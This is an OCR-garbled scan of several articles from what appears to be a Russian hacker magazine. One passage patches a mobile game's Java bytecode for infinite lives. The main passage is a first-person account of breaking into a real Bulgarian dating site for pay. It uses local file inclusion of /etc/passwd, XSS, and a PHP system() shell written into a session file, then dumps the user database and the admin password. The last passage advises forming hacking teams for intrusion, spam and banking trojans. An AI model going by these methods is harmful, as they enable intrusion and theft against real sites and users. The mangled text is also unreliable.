ФРАГМЕНТ ДИЗАССЕМБЛИРОВАННОГО БАЙТ-КОДА МЕТОДА Р{), 
УМЕНЬШАЮЩЕГО ПЕРЕМЕННУЮ АХ(СЧЕТЧИКЖИЗНЕЙ) 

НА ЕДИНИЦУ 

теб016_44 : 



; СОБЕХКЕЕ: Т_1+22 А з 
а1оас!_0 ; ѵаг01б_0 
бир 

дебіііеіб ах В ; // читаем переменную ах, закидывая ее 
на стек 
ісопзР_1 
ізиЬ 

читаем их 



; // закидываем на стек константу 1 
; // стягиваем со стека две ячейки и вы- 

; // преобразуем в іпб и забрасываем на 



іпР2Ьубе 
стек 

риСТіеІб ах В ; // обновляем содержимое переменной ах 
а1оаб_0 ; ѵаг01б_0 

деОТіеІб ах В 
ібде шеб016_10б 



А что если заменить команду ІзиЬ (опкод 64И/1 00) «парной» ей командой 
іасИ (опкод 606/96)? Эту операцию легко осуществить в любом Ьех-редак- 
торе, например в Ьіеѵѵ’е. Просто ищем последовательность «042/089/1 80 
001 199/004/100/145/181 001 199» (окружающую инструкцию ізиЬ) и меня- 
ем 1 00 на 96. Тогда при каждом столкновении со злобными приведениями 



количествожизней будетувеличиваться на единицу и... в конце концов 
мы получим незапланированное переполнение и наступиттрындец. А 
намтрындеца не надо! Нам надо корректный взлом. 

Хорошо! Попробуем заменить инструкцию ІзиЬ командой пор (опкод 00Ь). 
Кстати говоря, это можно сделать прямо в ЭаѵеВі1:е, не прибегая к помощи 
Ьіеѵѵ’а. Достаточно подвести курсор к ізиЬ, щелкнуть правой кнопкой 
мыши и в появившемся контекстном меню выбрать пункт ЕсІ И; Іпзіисбоп. 
Откроется диалоговое окно со списком всех возможных команд. Находим 
пор, жмем ОК и давим <СМ-5> (5аѵе Сіазз), чтобы сохранить результаты 
правки на диск. 

Воттолько результаты эти, мягко говоря, довольно удручающие. При 
запуске программы 4аѵа-верификаторзавершаетее выполнение в 
принудительном порядке. Это в х86-процессорах, с их регистровой архи- 
тектурой, инструкцию 5ЫВ можно безболезненно менять на ЫОР. Вирту- 
альная машина 4аѵа «исповедует» иной принцип, и аргументы команды 
ІзиЬ предварительно забрасываются на вершину стека в расчете на то, 
что она стащит их оттуда. Изменение ІзиЬ на пор вызывает дисбаланс 
стека, и, чтобы восстановить статус-кво, необходимо также занопить и 
команду ісопзМ . Инструкцию іп1:2Ьу1:е можно нетрогать, поскольку она 
дает нулевой побочный эффект, сохраняя стек втом состоянии, в каком 
он был до ее вызова. 

Короче говоря, корректно хакнутый байт-код выглядит так: 



БАИТ-КОД, ПОЛУЧИВШИМ «БЕССМЕРТИЕ» 

шеб01б_44 : 

; СОБЕХЕЕЕ: Ь_1 + 22 А з 
а1оаб_0 ; ѵаг016_0 
бир 

// читаем переменную ах, закидывая ее 



деббіеіб ах В 
на стек 
пор 
пор 

іпБ2Ьубе 

стек 

риббіеіб ах В 



// ничего не делаем 
// ничего не делаем 

// преобразуем в іпб и забрасываем на 
// обновляем содержимое переменной ах 



Мы сохраняем изменения в класс-файле по <СМ-5> (или по <Р9>, 
если мы работаем в Ьіеѵѵ’е) и нам остается только упаковать все 
файлы обратно в )аг-архив и залить его на сотовый телефон. Для 
тестирования, так сказать. 

При использовании ѴѴІпАсе достаточно выделить все файлы (включая 
каталоги), в типе архива указать 4аѵа5оЙ-4аг и плюхнуться на О К. А 
вот среди выходных форматов, поддерживаемых архиватором 72 ІР, 
никакого іа г’а нет! То есть он, конечно, есть, просто называется 2ІР’ом. 
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В АгсЬіѵе Іюгтаі: указываем 21 Р, в Сотргевзіоп Іеѵеі — КІогтаІ, поле 
Сотргезвіоп теіЬосІ выставляем в Бе^іаіе. Остальные параметры 
оставляем по умолчанию — как есть. Главное — не забыть вместо рас- 
ширения 2 і р у ка з ат ь і а г. Ну а имя файла можетбыть каким угодно. 

ЗАЛИВАЕМ ИГРУ НА ТЕЛЕФОН 

Вот мы имеем свежехакнутый файл Масготапдап Будем заливать его 
на телефон? А то! Сделать это можно разными путями. Например, по 
инфракрасному порту, голубому зубу, прямому кабельному соедине- 
нию или выкладывая файл на свой собственный ЫПр-сервер, а потом 
стягивая его оттуда через 6РР5. В общем, вариантов множество. Лично 
я предпочитаю ИК. 

Итак, игра залита нателефон и... дрожащими от волнения руками (все- 
таки наш первый взлом, как-никак), мы едва попадаем по клавишам, 
запуская игру. О чудо!!! Она работает (то есть не падает)! И самое главное 
— счетчикжизней навечнозастыл на отметке«2». Мы обрели бессмер- 
тие, а вместе стем утратили весь игровой азарт и интерес :). Ну какой 
интерес играть в игры? Вот ломать их — настоящий кайф! 

ЗАКЛЮЧЕНИЕ, ИЛИ ЧТО ЕЩЕ МОЖНО СДЕЛАТЬ 

Вот мы и совершили наш первый взлом мобильной игры! Как видишь, 
ничего сложного и сверхъестественного в этом нет. Не маги программы 
ломают. Это доступно каждому! Главное — сделать первый шаг, а там 
уж поле деятельности практически безгранично. Можно заменить все 
текстовые строки, втом числе относящиеся к копирайту компании-соз- 
дателя. Нето чтобы это былозаконно, но показывать друзьям мобилу с 
надписью «Наскеб Ьу...» достаточно приятно. 

Более творчески настроенные кодокопатели наверняка уже загружают 
спрайты в графический редактор, коверкая их в готическом хакерском 
стиле, или меняют логотип на заставке, который также находится в рпд- 
файлах, собранных в директории ітаде. 

Конечно, мы рассмотрели простейший случай взлома незащищенной 
программы. Некоторые игры и приложения тем или иным образом про- 
веряют целостность байт-кода, а также пропускаются через обфускаторы, 
добавляющие «мусорные» инструкции, которые отвлекают внимание и 
затрудняютанализ, но базовая техника взлома при этом все равно оста- 
ется той же. «Найти и обезвредить» — вот наш девиз! Знания приходят с 
опытом, а опыт — со временем, проведенным за ломанием игр. Да, и еще: 
не слишком-то распространяйся о своиххакерских наклонностях. Ато 
ведь и повязать могут, хотя «взлом для себя» закон не запрещает, но это 
уже тема совсем другого разговора. ШИ 




Внешний вид баѵа-декомпилятора 



Описание встретившихся в статье бѴМ-команд 



КОМАНДА 


ОПКОД 


ОПЕРАНДЫ 


ОПИСАНИЕ 


і2в 


9ІН/145 


1 ОПЕРАНД 
НА СТЕКЕ ТИПА ШТ 


СТЯГИВАЕТ С 
ВЕРШИНЫ СТЕКА 
ЗНАЧЕНИЕ ТИПА ШТ, 
УСЕКАЕТ ДО БАЙТА, 
СНОВА ПЕРЕВОДИТ В 
шт (с УЧЕТОМ знака) 
И ЗАБРАСЫВАЕТ 
РЕЗУЛЬТАТ ОБРАТНО 
НА СТЕК 


АІ_ОАО_<ІМ> 


|2Ан/42)+м 


1 ОПЕРАНД 
НА СТЕКЕ ТИПА 
ОВЗЕСТКЕР 


ИЗВЛЕКАЕТ ИЗ 
ОВЗЕСТКЕР ПЕРЕМЕН- 
НУЮ ПО ИНДЕКСУ <И> 
И ЗАБРАСЫВАЕТ ЕЕ НА 
ВЕРШИНУ СТЕКА 


оцр 


59н/89 


1 ОПЕРАНД НА СТЕКЕ 


СЧИТЫВАЕТ ОПЕРАНД 
СО СТЕКА, КЛОНИРУЕТ 
ЕГО И ЗАБРАСЫВАЕТ 
ОБРАТНО 


СЕТРІЕЮ 


В4н/180 


2 НЕПОСРЕДСТВЕННЫХ 
ИНДЕКСНЫХ БАЙТА, 

НА СТЕКЕ: ОВЗЕСТРЕР 
ИѴАШЕ 


ЗАБРАСЫВАЕТ НА 
ВЕРШИНУ СТЕКА 
ЗАДАННОЕ ПОЛЕ 
ДАННОГО КЛАССА 


1СО№Т_<1> 


(2н)+<і> 




ЗАБРАСЫВАЕТ НА 
ВЕРШИНУ СТЕКА 
КОНСТАНТУ <І> 


1511 В 


64н/100 


2 ОПЕРАНДА 
НА СТЕКЕ ТИПА ШТ 


СТЯГИВАЕТ С 
ВЕРШИНЫ СТЕКА ДВЕ 
ПЕРЕМЕННЫХ ТИПА 
ШТ, ВЫЧИТАЕТ ОДНУ 
ИЗ ДРУГОЙ И ЗАБРА- 
СЫВАЕТ РЕЗУЛЬТАТ 
ОБРАТНО НА СТЕК 


ІАОО 


60н/96 


2 ОПЕРАНДА 
НА СТЕКЕ ТИПА ШТ 


СТЯГИВАЕТ С 
ВЕРШИНЫ СТЕКА ДВЕ 
ПЕРЕМЕННЫЕ ТИПА 
ШТ, СКЛАДЫВАЕТ 
ИХ И ЗАБРАСЫВАЕТ 
РЕЗУЛЬТАТ ОБРАТНО 
НА СТЕК 


РІІТРІЕІ_0 


В5н/181 


2 НЕПОСРЕДСТВЕННЫХ 
ИНДЕКСНЫХ БАЙТА, 

НА СТЕКЕ: ОВ^СТРЕР 
И ѴАШЕ 


СТЯГИВАЕТ С ВЕРШИ- 
НЫ СТЕКА ПЕРЕМЕН- 
НУЮ И ЗАПИСЫВАЕТ 
ЕЕ В ЗАДАННОЕ ПОЛЕ 
ДАННОГО КЛАССА 


ІЧОР 


ООн 




НЕТ ОПЕРАЦИИ 
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ЛЕОНИД «НОЮ» ОТРОЙКОВ 

/ 5ТВОІКОѴ@САМЕЬАЫО.Ви / 



Болгарский 

бумеранг 

Взлом болгарского датинг-ресурса 

ПОМНИШЬ ЗАКОН БУМЕРАНГА? :) ЕСЛИ Я НЕ ОШИБАЮСЬ, ОН ФОРМУЛИРУЕТСЯ 
ПРИБЛИЗИТЕЛЬНО ТАК: «ВСЕ НАШИ ПОСТУПКИ ВСЕГДА ВОЗВРАЩАЮТСЯ К НАМ 
САМИМ». ЭТО ПОЛОЖЕНИЕ КАЖЕТСЯ ВЕСЬМА СОМНИТЕЛЬНЫМ, НО ЕСЛИ ЗА- 
ДУМАТЬСЯ, ТО МОЖНО НАЙТИ ПАРУ-ТРОЙКУ ЕГО ПОДТВЕРЖДЕНИЙ И В ЛИЧНОМ 
ОПЫТЕ. ЗАКОН БУМЕРАНГА ВСЕГДА РАБОТАЛ, РАБОТАЕТ И БУДЕТ РАБОТАТЬ. НУ А 
ЕСЛИ ВСЕ ЖЕ ПРОИЗОШЛА ОСЕЧКА - НИЧТО НЕ МЕШАЕТ НАМ САМИМ ПРИВЕСТИ 
НЕСЛОЖНЫЙ МЕХАНИЗМ ВДЕЙСТВИЕ. В ЭТОМТЫ СМОЖЕШЬ УБЕДИТЬСЯ НАПРИ- 
МЕРЕ МОЕЙ СТАТЬИ =). 



С ЧЕГО ВСЕ НАЧАЛОСЬ 

Одним из вечеров ко мне в асю стукнул мой старый приятель. Сквозь пото- 
ки мата, всхлипываний и причитаний ятаки смог разобрать суть вопроса. 
Оказалось, чтознакомого попросту обокрали, причемуперли вовсе не 
микроволновку, телевизор или новенький трЗ’шник, а покусились на 
святая святых — ноут (попутно выражаю соболезнования Зіер’у, чей бук 
также был похищен изуверами пару месяцев назад). По правде сказать, 
большого удивления я не испытал и вот почему. Мой приятель нетак 
давно переехал в Болгарию, где и обосновался для успешного продол- 
жения своей деятельности (какой — не скажу :)]. Как известно, эта страна 
славится своими ворами и мошенниками. Львиная доля липовых доков 
(права и паспорта разных стран мира), а также миллионы поддельных 
денежныхзнаков различных государств — всеэто Болгария. Одним сло- 
вом, если образ России немыслим без стандартного набора «балалайка, 
водка, матрешка», то в облике Болгарии неизменно присутствуют десяток 
паспортов-переклеек и пара мешков свежеотпечатанной наличности 
на первом плане =). Если ты уже задаешься вопросом: «Азачем мне это 
знать?», дам небольшое пояснение. Дело втом, что, если бы не сложилась 
подобная ситуация, я бы, скорее всего, не взялся за взлом того ресурса, о 
котором пойдет речь в статье. А речь пойдет, какты могдогадаться, имен- 
но об одном из крупных болгарских ресурсов :). Но обо всем по порядку. 
Проснувшись ближе к обеду и запустив асю, я обнаружил любопытную 
месса гу от своего сетевого товарища. В сообщении он просил помочьсо 
взломом заказанного ему датинга, предлагая разделитьобещанные ему 
дивиденды по-дружески: 50/50. За окном стояла 30-градусная жара, и рабо- 
тать совсем не хотелось. Но взглянуть на сайтя все же не поленился =). Ресурс 
действительно был посвящен знакомствам, флирту и прочим любовным 
утехам, воттолько находился он в болгарской доменной зоне .Ьд. Этот 
факт моментально напомнил мнео неприятной истории, приключившей- 



ся с моим знакомым, вследствие чего желание отыграться на раскручен- 
ном болгарском датинге возникло само собой :). 

Зарядив РгееСар свежим американским соксом и перезапустив браузер, 
я приступил кзадуманному. Набрав в адресной строке браузера урл 
ѵѵѵѵѵѵ.зіЫг.Ьа . я, как и ожидалось, оказался на сайте знакомств. Воттолько 
искать себе девушку в этот раз я не собирался (да и далековато — Бол- 
гария :)). В ходе предварительного осмотра стало ясно, что сайт, скорее 
всего, размещен на выделенном дедике, а значит, работать предстояло 
напрямую с«пациентом». Однако после первых 10 минутанализа движка, 
который был написан на РНР, мое настроение заметно улучшилось =). И, 
надо сказать, не без основания. Сперва я заметил прямо-таки режущий 
глаз инклуд: 

ЫзСр : / /шт. зіЬіг .Ъд/іпс1ех.р]тр?раде= 

/еСс/раззмс1%00 

Согласись, что пропустить такое «чудо» просто нереально :). Несмотря 
на то что инклуд оказался локальным, он незамедлительно был отмечен 
в закладках моего браузера. Дальше — больше. Еще один аналогичный 
инклудец я заметил в блогах на этом же датинге. Л инк на баг выглядел до 
боли просто: 

іШСр : / /ѵгѵш . зіЬіг . Ьд/Ыод/КЕІТУ_5ЕХУ/ 

?ЫодРаде= /еСс/ 
раззѵ\кІ%00&агЦІВ=1642 0 

Для полноты коллекции не хватало только активной ХЗЗ’ки и красивого 
ЗСБ-инъекта =). Впрочем, первую я обнаружил. Беда многих веб-про- 
граммеров заключается втом, что они уж очень любят лепить формочки 



► обо 
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У чувака кажется комплекс не- 
полноценности. Ломать бол- 
гарский ресурс только из-за 
того, что в этой стране украли 
ноут друга — это маразм. 



взлом 



Не, ну конечно, гОісІ — чувак 
маниакальный, это факт. Ноя 
думаю, ему просто лавэ захо- 
телось поднять, вот он и украл 
базу. А весь этот слезный гон 
про друга и ноутбук — просто 
отговорки. 



поиска по сайту, причем без какой-либо фильтрации передающихся 
параметров. Но, как говорится, чужое горе — свое счастье :). Мое счастье 
в этом эпизоде вырисовывалось примитивным запросомтипа <всгір1>а 
Іегі('ЫаЫаЫа’)</5Сгірі>, вбитым в ту самую формочку поиска. Каков был 
результат, догадаться нетрудно. Честно говоря, на первый взгляд датинг 
напоминал учебное пособие из серии «Какстать хакером за 1 час» :). Но 
что-то подсказывало мне, что расслабляться не стоит. 

Итак, в ходе рейда боевым путем было получено два локальных инклуда 
и одна Х55, которую я зарезервировал на крайний случай. Инклуды друг 
отдруга ничем не отличались, что сводило пользу от одного из них на 
нет. Следовательно, в моем распоряжении оставался лишь один убогий 
локальный инклуд. Такая постановка вопроса уже не казалась мне 
столь привлекательной. Тем не менее нужно было действовать. Первая 
загвоздка вышла с конфигом Апача, путь до которого никак не получалось 
подобрать. Второй облом поджидал меня с версией Л инухи, крутящейся 
на сервере. Запрос Шр :// уууууу. зі Ы г. Ь д/іпсІех.рЬр?раде=. 
ргос/ѵег5Іоп%00 издевательски вернул мне строчку: 

Ьіпих ѵегзіоп 2 . 6 . 18 . 1 ( гооЪ@1оса1ТюзЪ ) (дсс ѵегзіоп 

4.1.1 (СепРоо 4.1.1) ) #2 ЗМР Егі Ыоѵ 3 12:58:32 ЕЕТ 2006 



поиска конфигов для последующего прочтения ихс помощью инклуда. 
Вместо этогознакомый предложил попробовать произвести запись в 
темповый файл сессии с целью последующего обращения к нему. Идея, 
безусловно, была интересной, воттолько по собственному опыту я знал, 
что та кое удается далеко не всегда (а вернее, очень редко). Еслиты по 
какой-либо причине не въехал в суть затеи, то коротко поясню. 

Многие РНР-движки, использующие сессии, создают временные сесси- 
онные файлы, в которых сохраняется предыдущий запрос пользователя 
ресурса стой или иной сессией. Таким образом, при удачном раскладе по- 
являлась возможность выполнения собственного РНР-кода, что, в свою 
очередь, с большой долей вероятности гарантировало наличие шелла 
на сервере. Нотут возникло несколько проблем. Первая — поискпути до 
сессионных файлов; вторая, не менее важная, — разрешение на запись 
в них. Ксчастью, с поиском каталога все прошло гладко — он оказался 
стандартным — Дтр. Оставалось подобрать имя сессионного файла. 
После нескольких неудачных попытокбыл определен префикс в названии 
— «ве55_». То есть полный путь выглядел так: Дтр/5е55_номер_сессии. 
Следующим действием я извлекзначение собственной сессии из куков: 
03ае^607999с13с14Ы ббаі с93а767Ш1 , после чего сформировал нехитрый 
запрос, перейдя полинку: 




В момент взлома в моем распоряжении находился рутовый сплоиттолько 
подядро2.6.17, да итотбыл локальным :(. Аучитывая не первый час, про- 
веденный за монитором, продолжать взлом я хотел все меньше и потому 
отправился в оффлайн. 

ЧЕМ ВСЕ ЗАКОНЧИЛОСЬ 

На следующий день я посовещался стоварищем васе, обсудил с ним най- 
денные баги, и нами было принято решение о прекращении бессмысленного 



ТЩЦр : / /ш тг. зіЬіг . Ьд/іпсіех . р]тр?раде= 

/еЕс/раззѵ\гсІ%00%ЗС?%2 ОзузЕет ( $_ 

СЕТ [ %2 7 стсІ%2 7 ] ) ;%2 0?%ЗЕ 

Какты видишь, я собирался записать в свой сессионный файл строчку«<? 
5у5Іет($_Ѳ ЕТ[‘стсІ’]) ; ?>». Забегая вперед скажу, что мне это удалось =). 
Далее для прочтения своего же сессионного файла мной был заюзан 
локальный инклуд: 
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/Жч 







> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответст- 
венности не несут! 




/«ч 



> ІП^О 

Если есть возмож- 
ность записи в 
сессионный файл, 
непременно вос- 
пользуйся ей. 

Старайся искать 
новые варианты 
атаки или хотя бы 
комбинируй старые. 



ЫсОр: / /шм. зіЬіг . Ъд/іпсіех . ркр?раде= 

/ Дтр/зезз_03аеб607999с13с14Ы 
6Ьа1с93а7 67О81%00&стс1=іс1 

После загрузки страницы я сперва подумал, что задумка 
обломилась, поскольку своих прав в системе разглядеть 
на десктопе мне неудалось. Но, открыв НТМІ_-сорец паги и 
покопавшись в нем, я довольноулыбнулся =). Среди прочего 
сессионного мусора я нашел и результат выполнения коман- 
ды Іб : 

поБВ | Ь : 0 ; КедізОгаЦіоп_бгош | з : 0 : " " ; егг 
ог | а : 0 : { } еггогзКерІасе I а : 0 : { Ыагпіпд 
I а : 0 : { }тлагпіпдКер1асе I а : 0 : { } зиссезз I а 
: 0 : { } зиссеззКерІасе I а : 0 : { } орОіопз I а : 3 
: {з : 12 : " 81юѵ^_рго1і1е " ; і : 2 ; з : 9 : "8ксж_ 
рісз " ; і : 1 ; з : 11 : " 8ко\ѵ_ѵіс1еоз " ; і : 1 ; } аісі 
I і : 0 ; опІіпеТіше I і:1186133687; ОгаскРад 
еіз: 62 /екс/ 
раззжі иісІ=81 (араске) діс!=81 (араске) 
дгоирз=81 (араске) " 

Теперь перед выполнением каждой новой команды сначала 
следовало перейти по первомулинку, записав РНР-код в 
сессионный файл, и только после этого можно было «еди- 
норазово»заюзать шелл. Я вздохнул с облегчением: самая 
сложная часть работы была позади. Имея на руках возмож- 
ность выполнения команд в системе, пусть инее самыми же- 
ланными правами, оставалось лишьумело довести начатую 
атаку до победного конца. Порыскав по серверу, я наткнулся 
на занимательный каталог под скромным названием /зці. В 
нем мне особенно приглянулся файл и к О В.зці: 

кДДр : / /чапалл . зіЬіг . Ьд/іпЬех . ркр?раде= 



/ кшр/ зезз_03аеі607999с13с14Ы6 
<3а1с93а7 67б381%00&стс1=сак%20 . /здІ/БВ. зді 

Структура базы была как нельзя кстати, а пара строктутже 
переместилась ко мне на винт: 

Ш8ЕКТ ШТО ' Ассошік_т ч ('АІБ', 'Ьзегпате', 
'Разз', 'АссоипВ_Туре' ) 

ІЫ8ЕКТ ШТО 'Ріпіо_ш' ( 'АІБ' , 'Епате' , 

'Ьпаше' , 'СепЬег' , 'Вігкксіау', 'Зідп', 
'Етаіі', 'Ьсіку' , 'Соипкгу') 

Какты догадываешься, админку я получил без проблем. 
Аккаунт, кстати, имел занимательный вид (обрати внимание 
на пасс :)): 

логин: аЬшіп 
пароль: аЪссІеі 

Что было дальше, рассказывать не буду — думаю, итак все 
ясно. Отмечутолько, что понравиласьадминистрация блога =). 
Вдоволь на игравшись с ресурсом, я, как и обещал, передал 
его товарищу, а сам отправился за пивом. Все-таки лето 
— отдыхать надо :). 

НА ЗАМЕТКУ 

Напоследокхотел бы пожелать тебе никогда не упускать ни 
единого шанса, способного хоть на шаг приблизитьтебя к 
заветной цели. Каквидишь, одними примитивными багами 
нынче не обойтись. Конечно, встречаются ресурсы с баналь- 
ными инъектами или простенькими инклудами. Но зачастую 
их реализация заводит в тупик. Поэтому настоятельно 
рекомендую пробовать новые варианты или как минимум 
комбинировать старые, т 




Выполняем команды через вставку РНР-кода в сессионный файл 
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Поэтому пробки . 1 





сегодня 18:00 и 20:00 

Новые серии с 3 сентября! 
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В ПОСЛЕДНЕЕ ВРЕМЯ НА ПРОСТОРАХ РУССКОГО ХАК-АНДЕГРАУНДА ПРИХОДИТСЯ 
НАБЛЮДАТЬДОВОЛЬНО-ТАКИ ПЕЧАЛЬНОЕ ЗРЕЛИЩЕ. МНОГИЕ СЕРЬЕЗНЫЕ КОМАНДЫ 
ПРЕКРАЩАЮТСВОЮ ДЕЯТЕЛЬНОСТЬ ПО РЯДУ ПРИЧИН: КТО-ТО ПЕРЕХОДИТ В ЛЕГАЛ, 
КТО-ТО ВЫНУЖДЕН ЗАВЯЗАТЬ С ХАКОМ ПОД ДЕЙСТВИЕМ ЗАКОНА. МЕЖДУ ТЕМ КАК 
ГРИБЫ ПОСЛЕ ДОЖДЯ ПОЯВЛЯЮТСЯ ВСЕ НОВЫЕ И НОВЫЕТИМЫ, ОРГАНИЗОВАН- 
НЫЕ, КАК ПРАВИЛО, НОВИЧКАМИ. С ОДНОЙ СТОРОНЫ, ВПОЛНЕ ЛОГИЧНАЯ СИТУАЦИЯ 
-ОДНИУМИРАЮТ, И НАСМЕНУ ИМ ПРИХОДЯТ ДРУГИЕ. ВОТТОЛЬКО БЕДАВТОМ, ЧТО 
ДРУГИЕ НЕ ИМЕЮТНИ ОПЫТА, НИ ЗНАНИЙ, АУЧИТЬСЯ ИМ СТАНОВИТСЯ УЖЕ НЕУ КОГО. 
В РЕЗУЛЬТАТЕ МЫ ИМЕЕМ ДЕСЯТКИ ХАК-ФОРУМОВ, ЗАФЛУЖЕННЫХ ОТКРОВЕННО 
ГЛУПЫМИ ВОПРОСАМИ И ТОПИКАМИ С НАЗВАНИЯМИ ТИПА«НАБОР В 50РЕР_НАСК_ 
ТЕАМ!». НАВЕРНЯКА, ТЕБЕ САМОМУ НЕ РАЗ ПРИХОДИЛА В ГОЛОВУ ИДЕЯ СОЗДАТЬ 
СВОЮ КОМАНДУ ИЛИ ВСТУПИТЬ В УЖЕ СУЩЕСТВУЮЩУЮ. НЕ СПОРЮ, РАБОТАТЬ В 
ГРУППЕ КУДА ИНТЕРЕСНЕЕ, НЕЖЕЛИ В ОДИНОЧКУ (ХОТЯ И НАКАЗАНИЕ В ОТНОШЕ- 
НИИ ДЕЙСТВИЙ ДВУХ И БОЛЕЕ ЛИЦ ПОСЕРЬЕЗНЕЕ БУДЕТ :)). ОДНАКО ДЕЯТЕЛЬНОСТЬ 
ВТИМЕТРЕБУЕТСОВЕРШЕННО ИНОГО ПОДХОДА. КАКБЫТАМ НИ БЫЛО, ЕСЛИТЫ НЕ 
ХОЧЕШЬ, ЧТОБЫ ТВОЯ КОМАНДА СТАЛА ОЧЕРЕДНОЙ ОДНОДНЕВКОЙ, ЧИТАЙ ВНИМА- 
ТЕЛЬНО, АЯ ПОСТАРАЮСЬ ОБЪЯСНИТЬ ТЕБЕ ЧТОКЧЕМУ. 



► 064 
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ЦЕЛИ И ЗАДАЧИ 

Прежде всего необходимо определить для себя цели и задачи создавае- 
мой команды. Согласись, что набиратьлюдей ради сиюминутной прихоти 
по крайне мере неразумно. А поэтому давай четко решим, чем будет 
заниматься тима. Нет, пойми меня правильно, я вовсе не призываю печь 
пирожки и продавать их на привокзальной площади :]. Просто надо выде- 
лить конкретное направление, пусть даже и не одно. Ниже для примера я 
приведу несколько возможных вариантов: 

1. Взлом ресурсов 

2. Спам 

3. Созданиетроянов 

Я намеренно не стал включать в список кодинг, веб-дизайн и прочее. 

Хотя, какты понимаешь, все зависиттолько оттебя и отопыта твоих 
коллег. 

Итак, начнем потихоньку разбирать каждый и пунктов. Первым по 
списку идет взлом. Помнится, не та к давно на страницах нашего 
журнала один из читателей задавал вопрос о коммерциализации хака. 
Мол, вот раньше все делалось ради удовольствия и знаний, а сейчас 
лома ют только из-за денег. Так вот хочу сразу предостеречь тебя: если 
ты решил просто заработать денег, не имея ни опыта, ни желания, ни 
любви к подобного рода деятельности, — ничего не получится. Как ни 
крути, но легких денег не бывает, тем более в хакинге. Здесь следует 
учесть несколько нюансов. Сам по себе хак на заказ не прост, поэтому 
неплохо было бы дополнительно предоставлять услуги нагона тра- 
фика, вешая ифреймики на взломанные ресурсы (читай мою статью 
«Гоним траф» в ][ за июль 2007 года). Конкуренция имеет место быть, 
но так как профессиональных команд не та кмно го, она не настоль- 
ко велика, как, к примеру, среди людей, занимающихся почтовыми 
рассылками =). 

Плавно переходим кспаму. О нем яуже не раз писал на страницах^, но 
пару моментов напомню. Во-первых, нужен качественный софти базы 
мыльников, а во-вторых, спамеров на просторах Сети сейчас пруд пруди. 
Аналогичная ситуация и среди вирмейкеров. Написание банковского 
троя под заказ стоит немалых денег, и часть предприимчивых кодеров 
уже давно это усвоила. Тем не менее поле для деятельности все-таки есть, 
ведь найти толковых программеров порой весьма проблематично. 



Не хотелось бы за пугивать тебя, но конкуренция нынче везде: начиная 
от продажи семечек на местном рынке и заканчивая предоставлением 
хак/спам/кодинг-услуг. Именно по этой причине важно еще на первом 
этапе создания тимы, до набора людей, определиться с родом ее будущей 
деятельности. Конечно, со временем команда может менять свой профиль 
и расширятьспециализацию. Но вначале нужнатвердая опора, которая 
поможет команде встать на ноги. 

Крометого, тебе необходимо понимать степень ответственности, которую 
ты берешь на себя, организовывая людей для выполнения той или иной 
работы. Если ты к ней не готов, лучше сразу откажись от этой затеи — по- 
том будеттолько хуже. Могу сказать, что я так и сделал, просто перейдя 
втиму своего товарища (надобность в которой, кслову, впоследствии 
отпала). 

Сейчас достаточно много команд разной направленности. Выбирай ту, 
которая ближе тебе поуровню знаний и по роду деятельности. Кто знает, 
вполне возможно, именно она станеттвоим вторым домом =). 

МУТИМ ТИМУ 

Допустим, ты твердо решил, что новой команде быть. Что дальше? 

Первым делом нужно набрать людей для этой самой команды. Тутже 
появляется масса встречных вопросов: «Каких людей?», «Откуда?», 
«Сколько?». Действительно, этап не простой. Ведь оттого, какими будут 
мемберы тимы, зависит и будущее команды, и эффективность ее работы, 
а как следствие, и ее репутация в определенных кругах. Сосредоточиться 
стоит на следующих моментах: 

1. Количество человеке команде 

2. Метод отбора кандидатов в мемберы 

3. Специализация каждого отдельно взятого члена тимы 

Косвенно все пункты связаны между собой (в частности, последние два). 
Поэтому четких и конкретизированных ответов на свои вопросыты не 
получишь — по большому счету ты сам должен найти на них ответы, а моя 
задача — лишь на править тебя, указав верный путь :). 

По каким критериям стоит отбирать кандидатов, однозначно сказать 
нельзя. Но от каждого человека должен бытьтолк, скажу больше, 
каждый обязан разбираться в своей конкретно взятой области. Согла- 
сись, что набирать втиму одних кодеров не имеет смысла, также как и 
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Лично мне все эти объедине- 
ния в группы кажутся детским 
садом. Я думаю, что талант- 
ливый человек может и в 
одиночку всего добиться. 



> ІП^О 

Разделение труда 

— великое благо, не 
забывай это и актив- 
но его используй. 

Создание хак-тимы 

— не что иное, как 
создание ОПГ! 
Подумай, нужно ли 
онотебе? 



> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответст- 
венности не несут! 




Петров, к тебе мама в детстве 
котлетку не привязывала, 
чтоб с тобой хотя бы собачки 
играли? 



ань л 

Зр: 

І*1 



к 




укомплектовывать состав исключительно фродерами :]. 
Несомненно, если в команде будут взаимозаменяемые 
партнеры, это только положительно скажется на общем 
деле, но гораздо лучше, если они будут дополнять друг 
друга. Вообще, разделениетруда — великое благо, и 
пренебрегать им — непростительная ошибка. Поэтому на 
этапе организации работы основная задача — разделение 
видов деятельности между мемберами команды. Здесь 
следуетучесть ряд важных факторов: 

1. Личные навыки каждого отдельно взятого членатимы 

2. Возможность взаимодействия участников группы 

3. Межличностные отношения в команде 

По личным навыкам мемберов, думаю, вопросов не возник- 
нет (в противном случае перечитывай под главу за ново =)). А 
вот на втором и третьем пункте остановимся поподробнее. 
Дело втом, что на деятельность группы здорово влияет 
психологический фактор. Оттого, какая атмосфера царит 
в команде, зависит и качество выполненной работы. По- 
суди сам, если трое из пяти человек в тиме элементарно 
не будут выходить на связь и поддерживать контакты ме- 
жду собой, то о какой команде может идти речь? Поэтому 
еще на этапе создания тимы следует установить хорошие, 
дружеские отношения между всеми членами группы. 
Вопросы специализации решать, конечноже, не мне, но 
пару примеров-советов я все-таки приведу. Так, неплохо 
было бы включить в обязанности одного человека обес- 
печение безопасности, то есть установку сокс-серверов, 
ѴРЫ, слежение за дедиками команды. Порой очень 
неудобно, когда в самый разгар работы у тебя отвали- 
вается сокс/ѴРЫ и ты начинаешь решать эту проблему 
вместо того, чтобы завершить начатое. Также в чьи-либо 
обязанности не мешало бы добавить техподдержку сайта 
(о котором поговорим чуть позже) и работу с заказчика- 
ми. Одним словом, нагрузку между мемберами следует 
распределять равномерно, исходя из личных качеств 
участников команды. 

Кстати, насчет сайта. Его необходимо запустить в любом 
случае. Если есть опасения попадания вполез рения 
правоохранительных органов, можно сделать ресурс 
приватным, никто не запрещает =). Хотя при соответст- 



вующей раскрутке это будет явно лишним. Ведь новой 
команде нужно заявить о себе, а для этого нужна рекла- 
